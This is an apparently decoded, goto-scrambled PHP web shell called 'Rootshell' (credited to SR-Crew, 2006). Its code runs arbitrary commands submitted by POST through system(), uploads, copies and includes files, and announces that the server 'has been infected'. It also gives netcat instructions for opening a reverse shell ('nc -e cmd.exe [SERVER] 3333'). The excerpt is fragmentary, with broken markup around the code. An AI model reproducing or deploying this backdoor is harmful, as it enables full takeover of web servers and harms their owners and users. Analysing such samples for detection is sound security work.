/* Decoded by unphp.net */ Safe Mode ON"; goto VuxBC; Ypxc6: nP4l0(); goto puMgc; Y1u_v: print "Safe Mode OFF"; goto jTS05; h8wXl: goto dsjV1; goto BfXoV; NjtG4: PMs2g: goto rwJut; WfS8s: goto vD1tK; goto cDI0F; x3GbY: @($XZ0dj = system($_POST["command"])); goto oRV1t; yb1KD: gCqcL: goto U_r3X; TvtSw: echo "
File not found
"; goto VMIsC; RJAoU: echo " !\xa [ Server Info ] | \xa
\xa
Current Directory: echo $_SERVER['DOCUMENT_ROOT']; ?>
|
[ Command Execute ] |
\xa [ File Upload ] |
|
\xa
\xa |
||
[ Files & Directories ] |
[ File Inclusion ] |
|
\xa
|
Info: For a connect back Shell, use: nc -e cmd.exe [SERVER] 3333 \xa after local command: nc -v -l -p 3333 (Windows) |
\xa
____ _ ____ _ _ _\xa| _ \ ___ ___ | |_ / ___|| |__ ___| | | | |_) / _ \ / _ \| __| \___ \| '_ \ / _ \ | |\xa| _ < (_) | (_) | |_ _ ___) | | | | __/ | |\xa|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|\xa File already exist "; goto ennGd; IW3G_: $xBtXh = $X42N9; goto A7myT; j6dEn: copy($KhTBN, "{$xBtXh}"); goto gc9kA; VMIsC: dsjV1: goto WfS8s; tFKUx: echo "\xa \xa "; goto twAcr; twAcr: if (ini_get("safe_mode")) { goto Gohcp; } goto Y1u_v; u_F_I: if (empty($KhTBN)) { goto gCqcL; } goto IW3G_; bbD14: echo " |
\xa Rootshell v"; goto PeDOr; hhwkw: echo "This server has been infected by {$I5zo6}"; goto tFKUx; ennGd: vD1tK: goto yb1KD; OUZDM: echo " 2006 by SR-Crew |